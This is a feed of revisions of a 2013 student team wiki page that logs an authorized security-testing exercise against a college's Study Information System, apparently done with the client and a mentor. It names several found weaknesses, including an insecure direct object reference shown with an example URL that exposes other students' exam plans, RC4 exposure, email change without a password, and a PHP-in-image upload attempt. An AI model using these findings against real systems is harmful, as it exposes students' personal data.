** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to eachother ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62337</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62337"/>
		<updated>2013-04-04T14:57:51Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Results */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of project on the 4 April 2013 [[Media:2013_security_final_presentation.pdf]] (Made by whole team, structure by Sandra and Jurij)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to eachother about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to eachother ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Uploaded a picture (for a lecturer) infected with malicious .php code&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I tried this one thing all by myself that I found searching in google. I tried to upload a profile picture that had malicious .php code inside of it as a lecturer as they have right to do that. Unfortunately that didn&#039;t work and the php code was not rendered. I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
&lt;br /&gt;
I also learned to program sumorobots, more about Linux and Wireshark. We made the presentation structure together. And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* Tried to find out possible security holes from OIS site.&lt;br /&gt;
* Tested different attacking methods with DVWA&lt;br /&gt;
* SQL-injection tests into various places on OIS site.&lt;br /&gt;
* Tested some XSS methods&lt;br /&gt;
* Made presentation about Misconfigured Configuration.&lt;br /&gt;
* Prepared our presentation with other group members&lt;br /&gt;
* Spoke in daily summary&lt;br /&gt;
* Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What i learned?&#039;&#039;&#039;&lt;br /&gt;
* I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
* I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
* Working in international group&lt;br /&gt;
* How important documentation is&lt;br /&gt;
* Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
&#039;&#039;&#039;What I did?&#039;&#039;&#039;&lt;br /&gt;
* I studied hacking methods&lt;br /&gt;
* Tried some hacking methods with DVWA&lt;br /&gt;
* Iscanned website, try to find if there is some security risks&lt;br /&gt;
* Tried some SQL and XSS injections&lt;br /&gt;
* Made presentation of Sensitive Data Exposure&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What I learned?&#039;&#039;&#039;&lt;br /&gt;
* More than basics of how to hack?&lt;br /&gt;
* The most common hacking methods and how to use them.&lt;br /&gt;
* How to do SQL and XSS injections&lt;br /&gt;
* Basics of hacking tools&lt;br /&gt;
* How to find security risks&lt;br /&gt;
* How to work in international team.&lt;br /&gt;
* Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
&#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
* Searched for security holes in OIS student information site.&lt;br /&gt;
* Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
* Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
* Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
* Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
* Theory about OWASP TOP 10 threats&lt;br /&gt;
* How to do sql injections&lt;br /&gt;
* How to use Firefox tamperdata tool&lt;br /&gt;
* How to do cross-site scripting&lt;br /&gt;
* Completely understood what is use case and how to draw them&lt;br /&gt;
* How to monitor activities with Wireshark&lt;br /&gt;
* How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
I have learned about security breaches on the web. Have tried different parts of web for vulnerabilities and injection. Together with team learned how to make injection and XSS attacks using Linux. Through Linux was unfamiliar for me. Together with team we divided roles and found out most important points for presentation. Last but not least coworking with team and reaching same goal was one important task. I and Sandra were responsible for the final presentation structure.&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62327</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62327"/>
		<updated>2013-04-04T14:40:51Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
